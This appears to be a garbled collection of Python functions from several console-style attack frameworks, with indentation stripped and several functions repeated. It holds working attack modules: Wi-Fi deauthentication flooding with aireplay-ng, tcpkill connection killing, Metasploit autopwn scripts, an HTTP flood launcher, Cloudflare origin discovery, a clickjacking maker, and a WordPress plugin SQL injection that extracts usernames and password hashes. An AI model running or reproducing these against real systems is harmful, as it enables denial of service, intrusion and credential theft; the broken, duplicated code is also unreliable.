d.change("target", defaultimg)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
return
elif actions == "run" or actions == "r":
d.run()
try:
d.loading_file()
try:
with open(defaultimg, 'r') as comprossed:
if True:
try:
print "\n " + Hlp + " Forence Imagen Client help\n"
print " ------------------------------------------"
print " |extrat_all | extrat all MD | ls |"
print " ------------------------------------------"
cmd = "nop"
while (cmd != "exit"):
cmd = raw_input(
d.Client_prompt('forence{IMAGEN}'))
if (cmd == "extract_all"):
subprocess.call(
"perl files/exiftool/exiftool " +
defaultimg,
shell=True)
except:
Errors.Errors(event=sys.exc_info()[0],
info=False)
except:
Errors.Errors(event=sys.exc_info()[0], info=defaultimg)
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
exiftool(0)
def ddos(run):
global defaultint, defaultmac
try:
if run != 1:
actions = raw_input(d.prompt("wifi/dos"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("device", "yes", "Interface", defaultint)
d.descrip("bssid", "yes", "Mac Target", defaultmac)
d.helpAUX()
ping.interfaces(1)
ping.monitor()
d.space()
elif actions[0:10] == "set device":
defaultint = ping.update(defaultint, actions, "device")
d.change("device", defaultint)
ddos(0)
elif actions[0:9] == "set bssid":
defaultmac = ping.update(defaultmac, actions, "bssid")
d.change("bssid", defaultmac)
elif actions[0:5] == "start":
start = actions[6:]
print " " + Alr + " Starting Monitor Mode In " + start, ping.status_cmd(
"sudo airmon-ng start " + start, "\t\t\t")
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
elif actions == "run" or actions == "r":
d.run()
try:
if ping.checkDevice(defaultint):
print " " + Alr + " Starting attack to " + defaultmac
subprocess.call('aireplay-ng --deauth 100000 -a ' +
defaultmac + ' ' + defaultint,
shell=True)
stopAttack = raw_input(
' ' + Hlp + ' Press Any Key for Stop the Attack.')
subprocess.call("killall aireplay-ng", shell=True)
else:
d.NoDeviceFound(defaultint)
except:
Errors.Errors(event=sys.exc_info(), info=3)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info(), info=1)
ddos(0)
def cloudflare_resolver():
try:
line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line_1 += ":"
line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "CloudFlare Resolver" + wcolors.color.ENDC
line_1 += " > "
com = raw_input(line_1)
com = com.lower()
if com[0:10] =="set target":
options[0]=com[11:]
print "TARGET => ", options[0]
cloudflare_resolver()
elif com[0:12] =='show options':
print ""
print "Options\t\t Value\t\t\t RQ\t Description"
print "---------\t--------------\t\t----\t--------------"
print "Target\t\t"+options[0]+"\t\tyes\tTarget Address"
cloudflare_resolver()
elif com[0:2] =='os':
os.system(com[3:])
cloudflare_resolver()
elif com[0:4] =='help':
help.help()
cloudflare_resolver()
elif com[0:4] =='back':
pass
elif com[0:3] =='run':
sub = ('mail', 'webmail', 'email', 'direct-connect-mail',
'direct', 'direct-connect', 'cpanel', 'ftp', 'forum', 'blog',
'm', 'dev', 'record', 'ssl', 'dns', 'help', 'ns', 'ns1', 'ns2',
'ns3', 'ns4', 'irc', 'server', 'status', 'status', 'portal', 'beta',
'admin', 'imap', 'smtp')
try:
orgip = resolveit(options[0])
print "[-------------------------]"
print "[+] Default IP Address : %s"%orgip
print "[-------------------------]"
orgip.start()
except(socket.gaierror):
print "[-] Error : Host is Down !"
for i in sub:
host = i+'.'+options[0]
try:
ip = resolveit(host)
print "[+] %s : %s"%(host, ip)
ip.start()
except(socket.gaierror):
print "[-] %s : N/A"%host
cloudflare_resolver()
else:
print "Wrong Command =>" + com
except(KeyboardInterrupt):
print "\n[!] Operation Stoped By User."
def exiftool(run):
try:
global defaultimg
if run!=1:
actions=raw_input(d.prompt("for/imagen"))
else:
actions="run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("imagen","yes","img for forence",defaultimg)
print ""
elif actions[0:10] == "set imagen":
defaultimg=ping.update(defaultimg,actions,"imagen")
d.change("target",defaultimg)
elif actions=="exit" or actions=="x":
d.goodbye()
exit()
elif actions=="help" or actions=="h":
help.help()
elif actions=="back" or actions=="b":
return
return
elif actions=="run" or actions=="r":
d.run()
try:
d.loading_file()
try:
with open(defaultimg,'r') as comprossed:
if True:
try:
print "\n "+Hlp+" Forence Imagen Client help\n"
print " ------------------------------------------"
print " |"+colors[6]+"Command "+colors[0]+"| "+colors[6]+"Description"+colors[0]+" | "+colors[6]+"Examples"+colors[0]+" |"
print " ------------------------------------------"
print " |extrat_all | extrat all MD | ls |"
print " ------------------------------------------"
d.space()
cmd="nop"
while(cmd!="exit"):
cmd = raw_input(d.Client_prompt('forence{IMAGEN}'))
if(cmd=="extrat_all"):
subprocess.call("perl files/exiftool/exiftool "+defaultimg, shell=True)
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
except:
Errors.Errors(event=sys.exc_info()[0], info=defaultimg)
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
exiftool(0)
def webkiller():
try:
line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line_1 += ":"
line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "WebKiller" + wcolors.color.ENDC
line_1 += " > "
com = raw_input(line_1)
com = com.lower()
if com[0:13] == "set interface":
options[0] = com[14:20]
print "INTERFACE => ", options[0]
webkiller()
elif com[0:10] == "set target":
options[1] = com[11:]
print "TARGET => ", options[1]
webkiller()
elif com[0:12] == "show options":
print ""
print "Options\t\t Value\t\t\t\t RQ\t Description"
print "---------\t--------------\t\t\t----\t--------------"
print "Interface\t" + options[0] + "\t\t\t\tyes\tNetwork Interface Name"
print "TARGET\t\t" + options[1] + "\t\t\tyes\tTarget Web Address"
print ""
webkiller()
elif com[0:2] == "os":
os.system(com[3:])
webkiller()
elif com[0:4] == "help":
help.help()
webkiller()
elif com[0:4] == "back":
pass
elif com[0:3] == "run":
print (wcolors.color.BLUE + "[*]IP Forwarding ..." + wcolors.color.ENDC)
subprocess.Popen(
"echo 1 > /proc/sys/net/ipv4/ip_forward", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True
)
sleep(2)
command_1 = "tcpkill -i " + options[0] + " -9 host " + options[1]
subprocess.Popen(command_1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
line_3 = (
wcolors.color.GREEN
+ "[*]Attack Has Been Started, For Stop Attack Press [enter] Key..."
+ wcolors.color.ENDC
)
press_ak = raw_input(line_3)
os.system("killall tcpkill")
print (wcolors.color.BOLD + wcolors.color.BLUE + "[*]Attack Has Been Stoped." + wcolors.color.ENDC)
else:
print "Wrong Command => ", com
webkiller()
except (KeyboardInterrupt):
print (wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)
def wmap():
try:
line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line_1 += ":"
line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "Wmap" + wcolors.color.ENDC
line_1 += " > "
com = raw_input(line_1)
com = com.lower()
if com[0:10] =='set target':
options[0] = com[11:26]
print "TARGET => ", options[0]
wmap()
elif com[0:12] =='show options':
print ""
print "Options\t\t Value\t\t\t\t RQ\t Description"
print "---------\t--------------\t\t\t----\t--------------"
print "TARGET\t\t"+options[0]+"\t\t\tyes\tTarget IP Address"
print ""
wmap()
elif com[0:2] =='os':
os.system(com[3:])
wmap()
elif com[0:4] =='help':
help.help()
wmap()
elif com[0:4] =='back':
pass
elif com[0:3] =='run':
print(wcolors.color.YELLOW + "[*]Engine Has Been Started." + wcolors.color.ENDC)
sleep(2)
os.chdir('//tmp')
check_tmp = os.listdir(os.curdir)
if 'websploit_wmap.rc' in check_tmp:
os.system('rm -rf websploit_wmap.rc')
myfile = open ('websploit_wmap.rc', 'w')
myfile.write('workspace -d websploit-wmap\n')
myfile.write('workspace -a websploit-wmap\n')
myfile.write('load wmap\n')
myfile.write('sleep 3\n')
myfile.write('wmap_targets -c\n')
myfile.write('wmap_sites -a '+ options[0] + '\n')
myfile.write('wmap_targets -t '+ options[0] + '\n')
myfile.write('wmap_run -t\n')
myfile.write('sleep 3\n')
myfile.write('wmap_run -e\n')
myfile.write('exit -y\n')
myfile.close()
os.system ('msfconsole -r websploit_wmap.rc')
else:
print "Wrong Command => ", com
wmap()
except(KeyboardInterrupt):
print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)
def hd():
try:
line_1 = color.RED + "[" + color.CYAN + "XioChi" + color.RED + "]" + color.ENDC
line_1 += color.RED + "[" + color.CYAN + "wordpress/hdwebplayersql" + color.RED + "]>> " + color.ENDC
com = raw_input(line_1)
com = com.lower()
if com[0:10] =='set target':
target_ip = com[11:40]
options[0] = target_ip
print color.RED + "[" + color.CYAN + "Target" + color.RED + "]>> " + options[0]
dwnm()
elif com[0:12] =='show options':
print ""
print wcolors.color.CYAN+"Options\t\t Value\t\t\tRQ\t Description"
print wcolors.color.RED+"---------\t--------------\t\t------------------"
print wcolors.color.CYAN+"Target\t\t"+options[0]+"\tyes\tTarget ip addres"
dwnm()
elif com[0:2] =='os':
log.logger.single("Command Executed", "\n"+color.CYAN)
os.system(com[3:])
dwnm()
elif com[0:4] =='help':
help.help()
dwnm()
elif com[0:4] =='back':
pass
elif com[0:5] =='about':
about.about()
dwnm()
elif com[0:3] =='run':
log.logger.attack('Wordpress HD Web Player SQL Injection')
url = options[0]
try:
check = requests.get(url + '/wp-content/plugins/hd-webplayer/playlist.php', timeout=5)
if '<?xml version="' in check.text.encode('utf-8'):
Exploit = '/wp-content/plugins/hd-webplayer/playlist.php?videoid=1+union+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11+from+wp_users--'
GoT = requests.get(site + Exploit, timeout=5)
User_Pass = re.findall('<title>(.*)</title>', GoT.text.encode('utf-8'))
username = User_Pass[1].split(':')[0]
password = User_Pass[1].split(':')[1]
log.logger.attacksukses("Vulnerable!")
log.logger.attacksukses("Username : "******"Password : "******"Not Vulnerable")
except:
log.logger.error("Not Vulnerable")
else:
print color.RED + "[" + color.CYAN + "Wrong Command" + color.RED + "]>>" + com
dwnm()
except(KeyboardInterrupt):
print ""
def cloudflare_resolver():
try:
line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line_1 += ":"
line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "CloudFlare Resolver" + wcolors.color.ENDC
line_1 += " > "
com = raw_input(line_1)
com = com.lower()
if com[0:10] =="set target":
options[0]=com[11:]
print "TARGET => ", options[0]
cloudflare_resolver()
elif com[0:12] =='show options':
print ""
print "Options\t\t Value\t\t\t RQ\t Description"
print "---------\t--------------\t\t----\t--------------"
print "Target\t\t"+options[0]+"\t\tyes\tTarget Address"
cloudflare_resolver()
elif com[0:2] =='os':
os.system(com[3:])
cloudflare_resolver()
elif com[0:4] =='help':
help.help()
cloudflare_resolver()
elif com[0:4] =='back':
pass
elif com[0:3] =='run':
sub = ('mail', 'webmail', 'email', 'direct-connect-mail',
'direct', 'direct-connect', 'cpanel', 'ftp', 'forum', 'blog',
'm', 'dev', 'record', 'ssl', 'dns', 'help', 'ns', 'ns1', 'ns2',
'ns3', 'ns4', 'irc', 'server', 'status', 'status', 'portal', 'beta',
'admin', 'imap', 'smtp')
try:
orgip = socket.gethostbyname(options[0])
print "[-------------------------]"
print "[+] Default IP Address : %s"%orgip
print "[-------------------------]"
except(socket.gaierror):
print "[-] Error : Host is Down !"
for i in sub:
host = i+'.'+options[0]
try:
ip = socket.gethostbyname(host)
print "[+] %s : %s"%(host, ip)
except(socket.gaierror):
print "[-] %s : N/A"%host
cloudflare_resolver()
else:
print "Wrong Command =>" + com
except(KeyboardInterrupt):
print "\n[!] Operation Stoped By User."
def ddos(run):
global defaultint,defaultmac,defaulchan
try:
if run!=1:
actions=raw_input(d.prompt("wifi/dos"))
else:
actions="run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("device","yes","Interface",defaultint)
d.descrip("bssid","yes","Mac Target",defaultmac)
d.descrip("chann","yes","Channel ap",defaultmac)
d.helpAUX()
ping.interfaces(1)
ping.monitor()
d.space()
elif actions[0:10] == "set device":
defaultint=ping.update(defaultint,actions,"device")
d.change("device",defaultint)
ddos(0)
elif actions[0:9] == "set bssid":
defaultmac=ping.update(defaultmac,actions,"bssid")
d.change("bssid",defaultmac)
elif actions[0:5] == "start":
start = actions[6:]
print " "+Alr+" Starting Monitor Mode In "+start,ping.status_cmd("sudo airmon-ng start "+start,"\t\t\t")
elif actions=="exit" or actions=="x":
d.goodbye()
exit()
elif actions=="help" or actions=="h":
help.help()
elif actions=="back" or actions=="b":
return
elif actions=="run" or actions=="r":
d.run()
try:
if ping.checkDevice(defaultint):
print " "+Alr+" Starting attack to "+defaultmac
ping.Subprocess('aireplay-ng --deauth 100000 -a '+defaultmac+' '+defaultint)
NULL=raw_input(" "+Hlp+" for Stop DOS Attack (PRESS ANY KEY)")
subprocess.call("killall aireplay-ng", shell=True)
else:
d.NoDeviceFound(defaultint)
except:
Errors.Errors(event=sys.exc_info(), info=3)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info(), info=1)
ddos(0)
def csrfcreated():
try:
line_1 = wcolors.color.RED + "[" + wcolors.color.CYAN + "XioChi" + wcolors.color.RED + "]" + wcolors.color.ENDC
line_1 += wcolors.color.RED + "[" + wcolors.color.CYAN + "CSRF Maker" + wcolors.color.RED + "]>> " + wcolors.color.ENDC
com = raw_input(line_1)
if com[0:8] =='set csrf':
dork = com[9:40]
options[0] = dork
print wcolors.color.RED + "[" + wcolors.color.CYAN + "CSRF" + wcolors.color.RED + "]>> " +wcolors.color.YELLOW+ options[0]
csrfcreated()
elif com[0:12] =='show options':
print(wcolors.color.YELLOW + 26 * "#" +wcolors.color.RED+"[ Options List ]"+wcolors.color.YELLOW+ 26 * "#")
print wcolors.color.CYAN+"Options\t\t Value\t\t\t Description"
print wcolors.color.RED+"---------\t--------------\t\t------------------"
print wcolors.color.CYAN+"crsf\t\t"+options[0]+"\tCRSF Type Want To Create"
print(wcolors.color.YELLOW + 68 * "#"+wcolors.color.ENDC)
csrfcreated()
elif com[0:2] =='os':
log.logger.single("Command Executed", "\n"+wcolors.color.CYAN)
os.system(com[3:])
csrfcreated()
elif com[0:4] =='help':
help.help()
csrfcreated()
elif com[0:4] =='back':
pass
elif com[0:5] =='about':
about.about()
csrfcreated()
elif com[0:4] =='list':
print wcolors.color.CYAN+"clickjacking (Sorry Next Update Will Much More)"
csrfcreated()
elif com[0:3] =='run':
if options[0] =='clickjacking':
xssc = 'XSS'
line_2= line_1 + wcolors.color.RED + "[" + wcolors.color.CYAN + "%s CODE"%(xssc) + wcolors.color.RED + "]>> " + wcolors.color.ENDC
xss = raw_input(line_2)
ifrm = 'IFRAME'
line_3 = line_1 + wcolors.color.RED + "[" + wcolors.color.CYAN + "%s CODE"%(ifrm) + wcolors.color.RED + "]>> " + wcolors.color.ENDC
iframe = raw_input(line_3)
sss = iframe.replace('\n', '')
payloadcsrf.clickjacking(xss, iframe)
else:
log.logger.error("Your Options CSRF Not Found<Sorry My Payload Just Click Jacking...Wait Next Update :)")
csrfcreated()
else:
print wcolors.color.RED + "[" + wcolors.color.CYAN + "Wrong Command" + wcolors.color.RED + "]>> " + com
csrfcreated()
except(KeyboardInterrupt):
print ""
def autopwn():
try:
line = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line += ":"
line += wcolors.color.UNDERL + wcolors.color.BLUE + "Autopwn" + wcolors.color.ENDC
line += " > "
com = raw_input (line)
com = com.lower()
if com[0:10] =='set target':
options[0] = com[11:27]
print "TARGET => ", options[0]
autopwn()
elif com[0:12]=='show options':
print ""
print "Options\t\t Value\t\t\t RQ\t Description"
print "---------\t--------------\t\t----\t--------------"
print "TARGET\t\t"+options[0]+"\t\t\tyes\tTarget IP Address"
print ""
autopwn()
elif com[0:2] =='os':
os.system(com[3:])
autopwn()
elif com[0:4] =='help':
help.help()
autopwn()
elif com[0:4] =='back':
pass
elif com[0:3] =='run':
print (wcolors.color.YELLOW + "[*]Engine Has Been Started." + wcolors.color.ENDC)
print (wcolors.color.YELLOW + "[*]Please Wait ..." + wcolors.color.ENDC)
sleep(2)
os.system('cp modules/db_autopwn.rb /tmp;chmod +x /tmp/db_autopwn.rb')
os.chdir('//tmp')
check_tmp = os.listdir(os.curdir)
if 'websploit_autopwn.rc' in check_tmp:
os.system('rm -rf websploit_autopwn.rc')
myfile = open('websploit_autopwn.rc', 'w')
myfile.write ('workspace -d websploit\n')
myfile.write ('workspace -a websploit\n')
myfile.write ('db_nmap ' + options[0] + '\n')
myfile.write ('load /tmp/db_autopwn.rb\n')
myfile.write ('db_autopwn -t -x -p -e')
myfile.close()
os.system('msfconsole -r /tmp/websploit_autopwn.rc')
else:
print "Wrong Command => ", com
autopwn()
except(KeyboardInterrupt):
print ""
def wuis(run):
try:
global defaulthost, defaultport
if run != 1:
actions = raw_input(d.prompt("web/whois"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target", "yes", "IP or DNS", defaulthost)
d.descrip("port", "no", "Port of target", defaultport)
d.space()
elif actions[0:10] == "set target":
defaulthost = defaulthost.replace("http://", "")
defaulthost = ping.update(defaulthost, actions, "target")
d.change("target", defaulthost)
elif actions[0:8] == "set port":
defaultport = ping.update(defaultport, actions, "port")
d.change("port", defaultport)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
return
elif actions == "run" or actions == "r":
d.run()
try:
ping.live(defaulthost, defaultport)
if True:
try:
w = whois.whois(defaulthost)
if w:
wd = w.__dict__
for k, v in wd.items():
print('%20s\t"%s"' % (k, v))
print ""
except:
Errors.Errors(event=sys.exc_info(), info=False)
except:
Errors.Errors(event=sys.exc_info()[0],
info=defaulthost + ":" + defaultport)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
wuis(0)
def autopwn():
try:
line = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line += ":"
line += wcolors.color.UNDERL + wcolors.color.BLUE + "Autopwn" + wcolors.color.ENDC
line += " > "
com = raw_input (line)
com = com.lower()
if com[0:10] =='set target':
options[0] = com[11:27]
print "TARGET => ", options[0]
autopwn()
elif com[0:12]=='show options':
print ""
print "Options\t\t Value\t\t\t RQ\t Description"
print "---------\t--------------\t\t----\t--------------"
print "TARGET\t\t"+options[0]+"\t\t\tyes\tTarget IP Address"
print ""
autopwn()
elif com[0:2] =='os':
os.system(com[3:])
autopwn()
elif com[0:4] =='help':
help.help()
autopwn()
elif com[0:4] =='back':
pass
elif com[0:3] =='run':
print (wcolors.color.YELLOW + "[*]Engine Has Been Started." + wcolors.color.ENDC)
print (wcolors.color.YELLOW + "[*]Please Wait ..." + wcolors.color.ENDC)
sleep(2)
os.system('cp modules/db_autopwn.rb /tmp;chmod +x /tmp/db_autopwn.rb')
os.chdir('//tmp')
check_tmp = os.listdir(os.curdir)
if 'websploit_autopwn.rc' in check_tmp:
os.system('rm -rf websploit_autopwn.rc')
myfile = open('websploit_autopwn.rc', 'w')
myfile.write ('workspace -d websploit\n')
myfile.write ('workspace -a websploit\n')
myfile.write ('db_nmap ' + options[0] + '\n')
myfile.write ('load /tmp/db_autopwn.rb\n')
myfile.write ('db_autopwn -t -x -p -e')
myfile.close()
os.system('msfconsole -r /tmp/websploit_autopwn.rc')
else:
print "Wrong Command => ", com
autopwn()
except(KeyboardInterrupt):
print ""
def main():
try:
line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "GrimTurn" + wcolors.color.ENDC
line_1 += " > "
terminal = input(line_1)
if terminal[0:3] == 'use':
if terminal[4:15] == 'host/casper':
casper.casper()
main()
else:
print("Wrong Command =>", terminal)
main()
elif terminal[0:12] == 'show modules':
modules_database.modules_database()
main()
elif terminal[0:4] == 'help':
help.help()
main()
elif terminal[0:2] == 'os':
os.system(terminal[3:])
main()
elif terminal[0:7] == 'upgrade':
upgrade.upgrade()
main()
elif terminal[0:6] == 'update':
update.update()
elif terminal[0:5] == 'about':
about.about()
main()
elif terminal[0:13] == 'generate_name':
print(random_name.random_name())
main()
elif terminal[0:11] == 'trusted_mac':
print(trusted_mac.trusted_mac())
main()
elif terminal[0:4] == 'exit':
print(wcolors.color.YELLOW +
"[*] Thank You For Using GrimTurn =)" + wcolors.color.ENDC)
exit()
else:
print("Wrong Command =>", terminal)
main()
except (KeyboardInterrupt):
print(wcolors.color.RED +
"\n[*] (Ctrl + C ) Detected, Trying To Exit ..." +
wcolors.color.ENDC)
print(wcolors.color.YELLOW + "[*] Thank You For Using GrimTurn =)" +
wcolors.color.ENDC)
def dorkgrablink():
try:
line_1 = wcolors.color.RED + "[" + wcolors.color.CYAN + "XioChi" + wcolors.color.RED + "]" + wcolors.color.ENDC
line_1 += wcolors.color.RED + "[" + wcolors.color.CYAN + "scanner/google_dork" + wcolors.color.RED + "]>> " + wcolors.color.ENDC
com = raw_input(line_1)
if com[0:8] == 'set dork':
dork = com[9:9999]
options[0] = dork
print wcolors.color.RED + "[" + wcolors.color.CYAN + "Dork" + wcolors.color.RED + "]>> " + wcolors.color.YELLOW + options[
0]
dorkgrablink()
elif com[0:8] == 'set page':
pages = com[9:40]
options[1] = pages
print wcolors.color.RED + "[" + wcolors.color.CYAN + "Pages" + wcolors.color.RED + "]>> " + wcolors.color.YELLOW + options[
1]
dorkgrablink()
elif com[0:12] == 'show options':
print wcolors.color.CYAN + "Options\t\t Value\t\t\t Description"
print wcolors.color.RED + "---------\t--------------\t\t------------------"
print wcolors.color.CYAN + "Dork\t\t" + options[
0] + "\tInput Dork Value"
print "Page\t\t" + options[1] + "\t\t\tMax Page Scanning"
dorkgrablink()
elif com[0:2] == 'os':
log.logger.single("Command Executed", "\n" + wcolors.color.CYAN)
os.system(com[3:])
dorkgrablink()
elif com[0:4] == 'help':
help.help()
dorkgrablink()
elif com[0:4] == 'back':
pass
elif com[0:5] == 'about':
about.about()
dorkgrablink()
elif com[0:3] == 'run':
log.logger.attack("Starting Grab")
subprocess.Popen('python metamodules/scanner/grab_link.py %s %s' %
(options[0], options[1]),
shell=True).wait()
log.logger.attacksukses("Done Grabing")
dorkgrablink()
else:
print wcolors.color.RED + "[" + wcolors.color.CYAN + "Wrong Command" + wcolors.color.RED + "]>> " + com
dorkgrablink()
except (KeyboardInterrupt):
print ""
def arplook():
global defaulthost
while True:
actions = raw_input(O+" ktn/web/arplook > "+W)
if actions == "help":
help.help()
elif actions == "exit":
print C+" GooD"+W+" bye."
exit()
elif actions == "back":
return
elif actions == "show options":
print ""
print " ["+R+"+"+W+"] options"
print " |target : no\n"
print ""
print " ["+G+"+"+W+"] options current"
print " |target : ",defaulthost
print ""
arplook()
elif actions[0:10] == "set target":
print " ["+O+"!"+W+"] You can't do changes"
arplook()
elif actions == "run":
print("\n ["+G+"+"+W+"] Running")
while 1:
try:
cmd=Popen(['arp', '-a', '-n'], stdout=PIPE, stderr=PIPE)
try:
look=cmd.stdout.read()
cmd.stdout.close()
except:
error=cmd.stderr.read()
print error
cmd.stdout.close()
print(" ["+R+"-"+W+"] No network found")
if(str(starting))==(str(look)):
print " ["+O+"!"+W+"] Good... ", " at: ", datetime.now().strftime('%H:%M:%S')
else:
print " ["+O+"!"+W+"] ARP Table Changed ", " at: ", datetime.now().strftime('%H:%M:%S')
print " ["+G+"+"+W+"] Data:\n", look
time.sleep(15)
except(KeyboardInterrupt, SystemExit):
print(" ["+O+"!"+W+"] (Ctrl + C) Detected, System Exit")
return
return
exit()
arplook()
def wuis(run):
try:
global defaulthost,defaultport
if run!=1:
actions=raw_input(d.prompt("web/whois"))
else:
actions="run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target","yes","IP or DNS",defaulthost)
d.descrip("port","no","Port of target",defaultport)
d.space()
elif actions[0:10] == "set target":
defaulthost=defaulthost.replace("http://", "")
defaulthost=ping.update(defaulthost,actions,"target")
d.change("target",defaulthost)
elif actions[0:8] == "set port":
defaultport=ping.update(defaultport,actions,"port")
d.change("port",defaultport)
elif actions=="exit" or actions=="x":
d.goodbye()
exit()
elif actions=="help" or actions=="h":
help.help()
elif actions=="back" or actions=="b":
return
return
elif actions=="run" or actions=="r":
d.run()
try:
ping.live(defaulthost,defaultport)
if True:
try:
w = whois.whois(defaulthost)
if w:
wd = w.__dict__
for k, v in wd.items():
print('%20s\t"%s"' % (k, v))
print ""
except:
Errors.Errors(event=sys.exc_info(), info=False)
except:
Errors.Errors(event=sys.exc_info()[0], info=defaulthost+":"+defaultport)
else:
d.No_actions()
except:
Errors.Errors(event=sys.exc_info()[0], info=False)
wuis(0)
def wuis(run):
try:
global defaulthost, defaultport
if run != 1:
actions = raw_input(d.prompt("web/whois"))
else:
actions = "run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target", "yes", "IP or DNS", defaulthost)
d.descrip("port", "no", "Port of target", defaultport)
print ""
elif actions[0:10] == "set target":
defaulthost = actions[11:]
d.change("target", defaulthost)
wuis(0)
elif actions == "exit" or actions == "x":
d.goodbye()
exit()
elif actions == "help" or actions == "h":
help.help()
elif actions == "back" or actions == "b":
return
return
elif actions == "run" or actions == "r":
d.run()
try:
ping.live(defaulthost, defaultport)
if True:
try:
w = whois.whois(defaulthost)
if w:
wd = w.__dict__
for k, v in wd.items():
print('%20s\t"%s"' % (k, v))
print ""
except (KeyboardInterrupt):
d.kbi()
exit()
except:
d.off()
else:
d.nocommand()
except:
d.kbi()
exit()
wuis(0)
def wuis(run):
try:
global defaulthost,defaultport
if run!=1:
actions=raw_input(d.prompt("web/whois"))
else:
actions="run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target","yes","IP or DNS",defaulthost)
d.descrip("port","no","Port of target",defaultport)
print ""
elif actions[0:10] == "set target":
defaulthost = actions[11:]
d.change("target",defaulthost)
wuis(0)
elif actions=="exit" or actions=="x":
d.goodbye()
exit()
elif actions=="help" or actions=="h":
help.help()
elif actions=="back" or actions=="b":
return
return
elif actions=="run" or actions=="r":
d.run()
try:
ping.live(defaulthost,defaultport)
if True:
try:
w = whois.whois(defaulthost)
if w:
wd = w.__dict__
for k, v in wd.items():
print('%20s\t"%s"' % (k, v))
print ""
except(KeyboardInterrupt):
d.kbi()
exit()
except:
d.off()
else:
d.nocommand()
except:
d.kbi()
exit()
wuis(0)
def dosweb(run):
try:
global defaulthost,defaultport
if run!=1:
actions=raw_input(d.prompt("web/dos"))
else:
actions="run"
if actions == "show options" or actions == "sop":
d.option()
d.descrip("target","yes","IP or DNS",defaulthost)
d.descrip("port","no","Port of target",defaultport)
print ""
elif actions[0:10] == "set target":
defaulthost = actions[11:]
defaulthost = defaulthost.replace("http://", "")
d.change("target",defaulthost)
dosweb(0)
elif actions[0:8] == "set port":
defaultport = actions[9:]
d.change("port",defaultport)
dosweb(0)
elif actions=="exit" or actions=="x":
d.goodbye()
exit()
elif actions=="help" or actions=="h":
help.help()
elif actions=="back" or actions=="b":
return
return
elif actions=="run" or actions=="r":
d.run()
try:
ping.live(defaulthost,defaultport)
if True:
try:
subprocess.call('python "files/hulk/hulk.py" http://'+defaulthost, shell=True)
except(KeyboardInterrupt):
d.kbi()
except:
d.off()
else:
d.nocommand()
except:
d.kbi()
exit()
dosweb(0)
def main():
try:
first = BOLD + W + "hsf" + W
first += " > "
console = input(first)
if console == "help":
help.help()
main()
elif console == "use" or console == "use ":
print(R + "\nFor example" + W + ":" + BOLD +
" use scan/scanner\n" + W)
main()
elif console == "banner":
logo.logo()
menu.menu()
main()
elif console == "clear" or console == "cls":
clear()
main()
elif console == "show modules":
show_modules.show_modules()
main()
elif console == "exit":
print(R + "\n[*]" + W + " Exiting...\n" + W)
ts(1)
#MODULES
elif console == "use scan/scanner":
scanner.scanner()
main()
#SYSCOM
else:
print(R + "\nERROR" + W + ": Wrong command => " + console + "\n")
main()
except (KeyboardInterrupt):
print(R + "\n\n[*]" + W + " Exiting...\n" + W)
ts(1)
def webkiller():
try:
line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line_1 += ":"
line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "WebKiller" + wcolors.color.ENDC
line_1 += " > "
com = raw_input(line_1)
com = com.lower()
if com[0:13] =='set interface':
options[0] = com[14:20]
print "INTERFACE => ", options[0]
webkiller()
elif com[0:10] =='set target':
options[1] = com[11:]
print "TARGET => ", options[1]
webkiller()
elif com[0:12] =='show options':
print ""
print "Options\t\t Value\t\t\t\t RQ\t Description"
print "---------\t--------------\t\t\t----\t--------------"
print "Interface\t"+options[0]+"\t\t\t\tyes\tNetwork Interface Name"
print "TARGET\t\t"+options[1]+"\t\t\tyes\tTarget Web Address"
print ""
webkiller()
elif com[0:2] =='os':
os.system(com[3:])
webkiller()
elif com[0:4] =='help':
help.help()
webkiller()
elif com[0:4] =='back':
pass
elif com[0:3] =='run':
print (wcolors.color.BLUE + "[*]IP Forwarding ..." + wcolors.color.ENDC)
os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
sleep(2)
os.system('xterm -e tcpkill -i ' + options[0] +' -9 host ' + options[1] + ' &')
